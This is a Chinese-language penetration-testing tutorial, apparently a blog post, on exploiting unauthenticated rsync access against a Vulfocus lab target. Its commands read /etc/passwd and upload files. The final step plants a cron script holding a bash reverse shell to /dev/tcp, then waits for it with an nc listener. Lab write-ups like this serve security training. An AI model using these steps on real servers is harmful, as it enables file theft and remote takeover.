应用协议安全:Rsync-common 未授权访问.

应用协议安全:Rsync-common 未授权访问.

Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。


目录:

应用协议安全:Rsync-common 未授权访问.

Rsync-common 未授权访问

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客

漏洞的测试:

第一步:测试漏洞有没有存在.

第二步:测试 读取文件.

第三步:测试 下载文件.

第四步:测试 上传文件.

第五步:测试 反弹 shell


Rsync-common 未授权访问

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客

应用协议安全:Rsync-common 未授权访问._第1张图片

应用协议安全:Rsync-common 未授权访问._第2张图片

应用协议安全:Rsync-common 未授权访问._第3张图片


漏洞的测试:

第一步:测试漏洞有没有存在.

rsync rsync://172.16.10.130:10890

rsync rsync://测试 IP 地址:端口

应用协议安全:Rsync-common 未授权访问._第4张图片


第二步:测试 读取文件.

rsync rsync://172.16.10.130:55803/src/

应用协议安全:Rsync-common 未授权访问._第5张图片


第三步:测试 下载文件.

rsync rsync://172.16.10.130:10890/src/etc/passwd ./

rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下

应用协议安全:Rsync-common 未授权访问._第6张图片


第四步:测试 上传文件.

rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd 

rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/
rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.

应用协议安全:Rsync-common 未授权访问._第7张图片


第五步:测试 反弹 shell

前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.

直接下载 crontab 文件:

rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt

应用协议安全:Rsync-common 未授权访问._第8张图片


所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.


touch bgxg        #创建新文件.

vim bgxg          #编辑文件.

#添加在文件中的内容
/bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1

chmod +x bgxg     #添加权限.

应用协议安全:Rsync-common 未授权访问._第9张图片

应用协议安全:Rsync-common 未授权访问._第10张图片


再进行上传bgxg文件,把cron.hourly替换了

rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly

应用协议安全:Rsync-common 未授权访问._第11张图片

应用协议安全:Rsync-common 未授权访问._第12张图片


监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)

nc -lvvp 5566

应用协议安全:Rsync-common 未授权访问._第13张图片

   

   

    

 学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili

你可能感兴趣的:(渗透测试,领域.,#,服务攻防,领域.,Web安全,领域.,服务器,网络,linux,web安全,网络安全,安全)